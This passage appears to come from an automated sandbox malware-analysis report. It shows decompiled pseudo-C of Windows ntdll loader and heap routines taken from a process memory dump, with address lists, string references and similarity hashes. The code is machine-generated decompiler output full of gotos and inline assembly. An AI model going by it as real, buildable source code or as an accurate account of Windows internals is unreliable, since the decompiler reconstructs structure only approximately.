									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E030D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E030D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E030D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x31b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x31b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E030E2280(_t92, 0x31b86cc);
															_t94 = E03199DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E030F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x31b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E030D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x31b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x31b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0310F380(_t136, 0x30a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E030E2280(_t108, 0x31b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E030F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03199D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E030DFFB0(_t118, _t156, 0x31b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03109A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                                                    0x030d8799
                                                                                                                                                    0x030d879d
                                                                                                                                                    0x030d87a1
                                                                                                                                                    0x030d87a3
                                                                                                                                                    0x030d87a8
                                                                                                                                                    0x030d87c3
                                                                                                                                                    0x030d87c3
                                                                                                                                                    0x030d87c8
                                                                                                                                                    0x030d87d1
                                                                                                                                                    0x030d87d4
                                                                                                                                                    0x030d87d8
                                                                                                                                                    0x030d87e5
                                                                                                                                                    0x030d87ec
                                                                                                                                                    0x03129bfe
                                                                                                                                                    0x03129c00
                                                                                                                                                    0x03129c02
                                                                                                                                                    0x03129c08
                                                                                                                                                    0x03129c0d
                                                                                                                                                    0x03129c0f
                                                                                                                                                    0x03129c14
                                                                                                                                                    0x03129c2d
                                                                                                                                                    0x03129c32
                                                                                                                                                    0x03129c37
                                                                                                                                                    0x03129c3a
                                                                                                                                                    0x03129c3c
                                                                                                                                                    0x03129c42
                                                                                                                                                    0x03129c42
                                                                                                                                                    0x03129c3c
                                                                                                                                                    0x03129c02
                                                                                                                                                    0x030d87da
                                                                                                                                                    0x030d87df
                                                                                                                                                    0x030d87e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d87e3
                                                                                                                                                    0x030d87f2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d87fb
                                                                                                                                                    0x030d87fd
                                                                                                                                                    0x030d87fe
                                                                                                                                                    0x030d880e
                                                                                                                                                    0x030d880f
                                                                                                                                                    0x030d8810
                                                                                                                                                    0x030d8814
                                                                                                                                                    0x030d881a
                                                                                                                                                    0x030d881c
                                                                                                                                                    0x030d881f
                                                                                                                                                    0x030d8821
                                                                                                                                                    0x030d8822
                                                                                                                                                    0x030d8824
                                                                                                                                                    0x030d8826
                                                                                                                                                    0x030d882c
                                                                                                                                                    0x030d882e
                                                                                                                                                    0x03129c48
                                                                                                                                                    0x03129c48
                                                                                                                                                    0x030d8834
                                                                                                                                                    0x030d8834
                                                                                                                                                    0x030d8837
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8837
                                                                                                                                                    0x030d882e
                                                                                                                                                    0x030d883d
                                                                                                                                                    0x030d8840
                                                                                                                                                    0x030d8843
                                                                                                                                                    0x030d8846
                                                                                                                                                    0x030d8849
                                                                                                                                                    0x030d884c
                                                                                                                                                    0x030d884e
                                                                                                                                                    0x030d8850
                                                                                                                                                    0x030d8852
                                                                                                                                                    0x030d8854
                                                                                                                                                    0x030d8857
                                                                                                                                                    0x030d88b4
                                                                                                                                                    0x030d88b6
                                                                                                                                                    0x030d88b6
                                                                                                                                                    0x030d8859
                                                                                                                                                    0x030d8859
                                                                                                                                                    0x030d8859
                                                                                                                                                    0x030d8861
                                                                                                                                                    0x030d8866
                                                                                                                                                    0x030d886a
                                                                                                                                                    0x030d893d
                                                                                                                                                    0x030d8941
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8947
                                                                                                                                                    0x030d8947
                                                                                                                                                    0x030d894a
                                                                                                                                                    0x030d894c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8952
                                                                                                                                                    0x030d8955
                                                                                                                                                    0x030d895a
                                                                                                                                                    0x030d895d
                                                                                                                                                    0x030d895d
                                                                                                                                                    0x030d895f
                                                                                                                                                    0x030d8961
                                                                                                                                                    0x030d8961
                                                                                                                                                    0x030d8968
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d896a
                                                                                                                                                    0x030d896b
                                                                                                                                                    0x030d896e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8970
                                                                                                                                                    0x030d8970
                                                                                                                                                    0x030d8970
                                                                                                                                                    0x030d8970
                                                                                                                                                    0x030d8972
                                                                                                                                                    0x030d8972
                                                                                                                                                    0x030d8974
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d897a
                                                                                                                                                    0x030d897a
                                                                                                                                                    0x030d897d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8983
                                                                                                                                                    0x03129c65
                                                                                                                                                    0x03129c6d
                                                                                                                                                    0x03129c72
                                                                                                                                                    0x03129c75
                                                                                                                                                    0x03129c75
                                                                                                                                                    0x03129c82
                                                                                                                                                    0x03129c86
                                                                                                                                                    0x03129c87
                                                                                                                                                    0x03129c88
                                                                                                                                                    0x03129c89
                                                                                                                                                    0x03129c8c
                                                                                                                                                    0x03129c90
                                                                                                                                                    0x03129c95
                                                                                                                                                    0x03129c97
                                                                                                                                                    0x03129ca0
                                                                                                                                                    0x03129ca3
                                                                                                                                                    0x03129ca9
                                                                                                                                                    0x03129ca9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129ca9
                                                                                                                                                    0x03129ca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129c97
                                                                                                                                                    0x030d897d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8974
                                                                                                                                                    0x030d8988
                                                                                                                                                    0x030d8992
                                                                                                                                                    0x030d8996
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8996
                                                                                                                                                    0x030d894c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8870
                                                                                                                                                    0x030d887b
                                                                                                                                                    0x030d887d
                                                                                                                                                    0x030d887f
                                                                                                                                                    0x030d8881
                                                                                                                                                    0x030d8884
                                                                                                                                                    0x030d8884
                                                                                                                                                    0x030d8886
                                                                                                                                                    0x030d8889
                                                                                                                                                    0x030d888c
                                                                                                                                                    0x030d888e
                                                                                                                                                    0x030d8891
                                                                                                                                                    0x030d8891
                                                                                                                                                    0x030d8898
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d889a
                                                                                                                                                    0x030d889b
                                                                                                                                                    0x030d889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d88a0
                                                                                                                                                    0x030d88a8
                                                                                                                                                    0x030d88b0
                                                                                                                                                    0x030d88b2
                                                                                                                                                    0x030d88d3
                                                                                                                                                    0x030d88d5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d88d7
                                                                                                                                                    0x030d88db
                                                                                                                                                    0x030d88dc
                                                                                                                                                    0x030d88e0
                                                                                                                                                    0x030d88e8
                                                                                                                                                    0x030d88ee
                                                                                                                                                    0x030d88f0
                                                                                                                                                    0x030d88f3
                                                                                                                                                    0x030d88fc
                                                                                                                                                    0x030d8901
                                                                                                                                                    0x030d8906
                                                                                                                                                    0x030d890c
                                                                                                                                                    0x030d890c
                                                                                                                                                    0x030d890f
                                                                                                                                                    0x030d8916
                                                                                                                                                    0x030d8917
                                                                                                                                                    0x030d8918
                                                                                                                                                    0x030d8919
                                                                                                                                                    0x030d891a
                                                                                                                                                    0x030d891f
                                                                                                                                                    0x030d8921
                                                                                                                                                    0x03129c52
                                                                                                                                                    0x03129c55
                                                                                                                                                    0x03129c5b
                                                                                                                                                    0x03129cac
                                                                                                                                                    0x03129cc0
                                                                                                                                                    0x03129cc0
                                                                                                                                                    0x03129c55
                                                                                                                                                    0x030d8927
                                                                                                                                                    0x030d8927
                                                                                                                                                    0x030d892f
                                                                                                                                                    0x030d8933
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d88f5
                                                                                                                                                    0x030d88f5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d88f7
                                                                                                                                                    0x030d88f7
                                                                                                                                                    0x030d88fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d88fa
                                                                                                                                                    0x030d88f5
                                                                                                                                                    0x030d88f3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d88d5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d88b2
                                                                                                                                                    0x030d88c9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d88c9
                                                                                                                                                    0x030d887f
                                                                                                                                                    0x030d886a
                                                                                                                                                    0x030d8857
                                                                                                                                                    0x030d8852
                                                                                                                                                    0x030d88bf
                                                                                                                                                    0x030d88bf
                                                                                                                                                    0x030d87aa
                                                                                                                                                    0x030d87ad
                                                                                                                                                    0x030d87ae
                                                                                                                                                    0x030d87b4
                                                                                                                                                    0x030d87b5
                                                                                                                                                    0x030d87b6
                                                                                                                                                    0x030d87b8
                                                                                                                                                    0x030d87bd
                                                                                                                                                    0x030d87c1
                                                                                                                                                    0x030d87f4
                                                                                                                                                    0x030d87fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d87c1
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 03129C28
                                                                                                                                                    • LdrpDoPostSnapWork, xrefs: 03129C1E
                                                                                                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03129C18
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                                                    • API String ID: 0-1948996284
                                                                                                                                                    • Opcode ID: 5650f7bfa2253682fcb3ba8d10965442d58d72d89ebc3a99a0bf79b160691fd9
                                                                                                                                                    • Instruction ID: db1d6e14006524ea0cc65e1de1e5c7639c0c12236f0968a5b57bfb5d83d206af
                                                                                                                                                    • Opcode Fuzzy Hash: 5650f7bfa2253682fcb3ba8d10965442d58d72d89ebc3a99a0bf79b160691fd9
                                                                                                                                                    • Instruction Fuzzy Hash: 7F91F571A023159FDB58DF58C480ABAB7F9FF49310B498069E945AB140E730E951CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FAC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E030FAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0311D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x31b8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E031096E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E03173C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E031096E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E030CB150();
							} else {
								E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E030CB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E031814FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E030E7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E03181411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E030E7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E03181411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                                                                                                    0x030fac85
                                                                                                                                                    0x030fac88
                                                                                                                                                    0x030fac8a
                                                                                                                                                    0x030fac8d
                                                                                                                                                    0x030fac91
                                                                                                                                                    0x030fac99
                                                                                                                                                    0x030fac9c
                                                                                                                                                    0x03139f57
                                                                                                                                                    0x03139f5b
                                                                                                                                                    0x03139f60
                                                                                                                                                    0x03139f60
                                                                                                                                                    0x030faca8
                                                                                                                                                    0x030facae
                                                                                                                                                    0x030facda
                                                                                                                                                    0x030facde
                                                                                                                                                    0x030face8
                                                                                                                                                    0x030faceb
                                                                                                                                                    0x030facee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030facee
                                                                                                                                                    0x030facf6
                                                                                                                                                    0x030facb0
                                                                                                                                                    0x030facb0
                                                                                                                                                    0x030facbb
                                                                                                                                                    0x030facbd
                                                                                                                                                    0x030facc0
                                                                                                                                                    0x030facc5
                                                                                                                                                    0x030fadae
                                                                                                                                                    0x030fadb4
                                                                                                                                                    0x030fadb4
                                                                                                                                                    0x030facd4
                                                                                                                                                    0x030facd8
                                                                                                                                                    0x030facf9
                                                                                                                                                    0x030facff
                                                                                                                                                    0x030fad04
                                                                                                                                                    0x030fad08
                                                                                                                                                    0x030fad09
                                                                                                                                                    0x030fad10
                                                                                                                                                    0x030fad12
                                                                                                                                                    0x030fad18
                                                                                                                                                    0x03139f6f
                                                                                                                                                    0x03139f74
                                                                                                                                                    0x03139f76
                                                                                                                                                    0x03139f7c
                                                                                                                                                    0x03139f84
                                                                                                                                                    0x03139f88
                                                                                                                                                    0x03139f89
                                                                                                                                                    0x03139f90
                                                                                                                                                    0x03139f90
                                                                                                                                                    0x03139f76
                                                                                                                                                    0x030fad1e
                                                                                                                                                    0x030fad24
                                                                                                                                                    0x030fad26
                                                                                                                                                    0x0313a097
                                                                                                                                                    0x0313a09b
                                                                                                                                                    0x0313a0ba
                                                                                                                                                    0x0313a0bf
                                                                                                                                                    0x0313a09d
                                                                                                                                                    0x0313a0b2
                                                                                                                                                    0x0313a0b7
                                                                                                                                                    0x0313a0c5
                                                                                                                                                    0x0313a0c8
                                                                                                                                                    0x0313a0cb
                                                                                                                                                    0x0313a0d2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fad2c
                                                                                                                                                    0x030fad2c
                                                                                                                                                    0x030fad2f
                                                                                                                                                    0x030fad34
                                                                                                                                                    0x030fad36
                                                                                                                                                    0x03139f97
                                                                                                                                                    0x03139f9a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03139fa9
                                                                                                                                                    0x030fad3e
                                                                                                                                                    0x030fad3e
                                                                                                                                                    0x030fad41
                                                                                                                                                    0x03139fb3
                                                                                                                                                    0x03139fb9
                                                                                                                                                    0x03139fc0
                                                                                                                                                    0x03139fd0
                                                                                                                                                    0x03139fd0
                                                                                                                                                    0x03139fc0
                                                                                                                                                    0x030fad4a
                                                                                                                                                    0x030fad50
                                                                                                                                                    0x030fad5c
                                                                                                                                                    0x030fad62
                                                                                                                                                    0x030fad68
                                                                                                                                                    0x030fad6b
                                                                                                                                                    0x030fad6d
                                                                                                                                                    0x03139fda
                                                                                                                                                    0x03139fdd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03139fec
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fad73
                                                                                                                                                    0x030fad73
                                                                                                                                                    0x030fad73
                                                                                                                                                    0x030fad75
                                                                                                                                                    0x030fad75
                                                                                                                                                    0x030fad78
                                                                                                                                                    0x03139ff6
                                                                                                                                                    0x03139ffc
                                                                                                                                                    0x0313a003
                                                                                                                                                    0x0313a00e
                                                                                                                                                    0x0313a010
                                                                                                                                                    0x0313a01b
                                                                                                                                                    0x0313a01b
                                                                                                                                                    0x0313a01b
                                                                                                                                                    0x0313a038
                                                                                                                                                    0x0313a038
                                                                                                                                                    0x0313a003
                                                                                                                                                    0x030fad84
                                                                                                                                                    0x030fad89
                                                                                                                                                    0x030fad8c
                                                                                                                                                    0x030fad8e
                                                                                                                                                    0x0313a042
                                                                                                                                                    0x0313a045
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313a054
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fad94
                                                                                                                                                    0x030fad94
                                                                                                                                                    0x030fad94
                                                                                                                                                    0x030fad96
                                                                                                                                                    0x030fad96
                                                                                                                                                    0x030fad99
                                                                                                                                                    0x0313a063
                                                                                                                                                    0x0313a065
                                                                                                                                                    0x0313a070
                                                                                                                                                    0x0313a070
                                                                                                                                                    0x0313a070
                                                                                                                                                    0x0313a08d
                                                                                                                                                    0x0313a08d
                                                                                                                                                    0x030fada4
                                                                                                                                                    0x030fada6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fada6
                                                                                                                                                    0x030fad8e
                                                                                                                                                    0x030fad6d
                                                                                                                                                    0x030fad3c
                                                                                                                                                    0x030fad3c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fad3c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030facd8

                                                                                                                                                    Strings
                                                                                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0313A0CD
                                                                                                                                                    • HEAP: , xrefs: 0313A0BA
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0313A0AD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                    • API String ID: 0-1340214556
                                                                                                                                                    • Opcode ID: bfb425f0a98e32350166162d46a2233d6002ca7345b91f2ba2a137a0ec88d209
                                                                                                                                                    • Instruction ID: c5d05b471471f4da89fdbcdbbf40dfad304351ec02703ec8517ed5ae0f5e5ba3
                                                                                                                                                    • Opcode Fuzzy Hash: bfb425f0a98e32350166162d46a2233d6002ca7345b91f2ba2a137a0ec88d209
                                                                                                                                                    • Instruction Fuzzy Hash: D4811735305784EFD726CBA8C884FAABBF8FF09710F0845A5E6568B692D774E940CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                    			E030EB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0318A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x31b8748 >= 1) {
					__eflags = _a12 - _t141;
